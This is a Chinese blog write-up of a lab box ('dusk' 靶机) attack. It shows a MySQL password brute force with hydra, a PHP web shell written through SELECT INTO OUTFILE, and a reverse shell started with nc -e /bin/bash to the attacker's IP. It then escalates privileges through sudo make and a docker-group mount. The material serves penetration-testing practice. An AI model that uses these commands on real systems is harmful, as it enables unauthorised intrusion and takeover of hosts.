dusk 靶机

dusk

信息搜集

存活检测

image-20231031113746932

详细扫描

image-20231031114114581

扫描出以下开放端口

image-20231031114135407

后台网页扫描

image-20231031113917997

网页信息搜集

image-20231031114207611

查看开放的 8080 端口

可知工作路径在 /var/tmp 下

image-20231031114259066

继续进行信息搜集,未发现有用信息

反弹 shell

尝试爆破数据库

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.4.7.158:3306

成功爆破出密码 password

image-20231031114729000

数据库登录

image-20231031114945824

查看MySQL服务器的安全相关的配置变量

show variables like '%secure%';

secure_file_priv为空,可以读取磁盘的目录。

image-20231031115109627

向目录 /var/tmp 下写入一句话木马

select "<?php system($_GET['cmd']);?>" into outfile "/var/tmp/backdoor.php";

image-20231031131840892

写入的 php 文件可以成功访问

image-20231031131910601

kali 开启 nc 监听

image-20231031131421809

url 输入连接命令

http://10.4.7.158:8080/backdoor.php?cmd=nc -e /bin/bash 10.4.7.146 8888

image-20231031132035685

成功反弹

image-20231031132102352

提权

sudo -l 查看 root 权限

image-20231031132503301

dusk 用户可以无密码使用 sudo make

make 提权命令

COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"

成功提权到 dusk

image-20231031132709766

发现 duck 在 docker 组内

image-20231031132822252

提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

成功提权

image-20231031133636711

将文件夹挂载到mnt文件夹

在容器中运行 Alpine 镜像,并将主机的 /root 目录挂载到容器的 /mnt 目录。

具体来说,命令的各个部分的含义如下:

  • docker run:运行一个 Docker 容器。

  • -it:创建一个交互式的终端会话,并分配一个伪终端。

  • -v /root:/mnt:将主机的 /root 目录挂载到容器的 /mnt 目录。

    容器中的 /mnt 目录将显示主机中 /root 目录的内容,并且对 /mnt 目录的更改将反映在主机的 /root 目录中。

  • alpine:指定要运行的容器镜像,这里是 Alpine 镜像。

    alpine 容器提供了一个基于 Alpine Linux 的最小化运行环境

通过这个命令,可以在 Alpine 容器中访问和操作主机上的 /root 目录中的文件和目录。

总结

  • 数据库写入
  • docker 提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值